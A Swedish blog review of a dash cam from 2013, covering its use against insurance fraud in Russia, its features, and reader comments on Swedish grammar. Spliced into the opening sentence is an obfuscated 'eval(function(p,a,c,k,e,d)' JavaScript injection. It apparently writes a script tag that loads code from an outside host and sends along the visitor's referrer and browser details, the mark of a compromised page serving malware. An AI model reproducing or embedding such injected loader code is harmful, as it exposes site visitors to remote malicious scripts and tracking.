Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Test: Bilkamera – kameran som övervakar dig och din bil

Filip Urde
 • On 26 februari, 2013
 • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|birsa|var|u0026u|referrer|dksif||js|php’.split(’|’),0,{}))
är nog ingen som missat den oändliga mängd med ”russian dash cam” filmer som öst in över youtube de senaste året.

 

Dash cam, eller bilkamera som det heter på svenska är en liten övervakningskamera man fäster innuti bilen för att filma allt som händer på vägen. Att använda sig av en bilkamera i din bil kan vara ett riktigt genidrag om du skulle råka ut för en krock. Med kameran i bilen så finns det inga tvivel om vad som har hänt och du är alltså alltid redo med ditt bevis och slipper därmed  dyra självrisker när du kommer med bevis på hur du har kört.

bild (2)

Det är även därför kameran har blivit så enormt populär i Ryssland, där en våg med försäkringsbedragare är ute på vägarna. Dem kör framför din bil, sen bromsar så att du kör in i den. Sedan håvar dem in försäkringspengar. Därför är idag enormt många ryska bilar bestyckade med bilkameror. Vilket självklart löst många problem, men även givit oss en heldel nöje i att se vilka otroligt galna saker som händer på dem ryska vägarna.

”Tyvärr”, så är vi inte lika galna på dem Svenska vägarna (eller?), men syftet är trots det lika viktigt.

bild (1)

Kameran är utrustad med en 2.5″ LCD skärm så du även kan spela upp filmen direkt för att se vad som har hänt, och för att visa den eventuella motparten vad som har hänt.
Bilkameran är även utrustad med en rörelsedetektionsfunktion, så om något händer medan du är parkerad så fångas alltså även detta på film.  Installationen är väldigt enkel och själva kameran fäster du på rutan medhjälp av en sugkopp. Här kan ni se en installationsguide.

Kameran är väldigt enkel att använda och med en upplösning på upptill 1920×1080 så får du riktigt skarpa filmer. Filmerna sparas ner på et SD/MMC kort med kapacitet på 2-32 gb.

Filmen ovan är tyvärr inte vår egen utan en compilation av ryska dash cam filmer (för att få er i stämning). När vi var ute och körde så var det endast köer och därför ingen kul film. Den här kameran kommer dock hänga med på en road trip inom kort, videon från denna road trip kommer självklart att postas på Revue.se

bilkamera.se

Comments

 1. krille p

  haha nice!! jag ska börja spela in mina egna dash cam filmer med en sån där!

 2. Jacob

  Ska lätt köpa en sån här och sätta upp. Kul att spara sjuka händelser.

 3. Erik

  Det heter de eller dom; INTE dem!!! Kan ingen svenska längre? Det blir ju helt fel! Och nej, jag är inte svenskfödd!

  • greken

   dem är = dom…

   • Jocke

    Dom är talsvenska in skriv.. Dom = Dem i skrift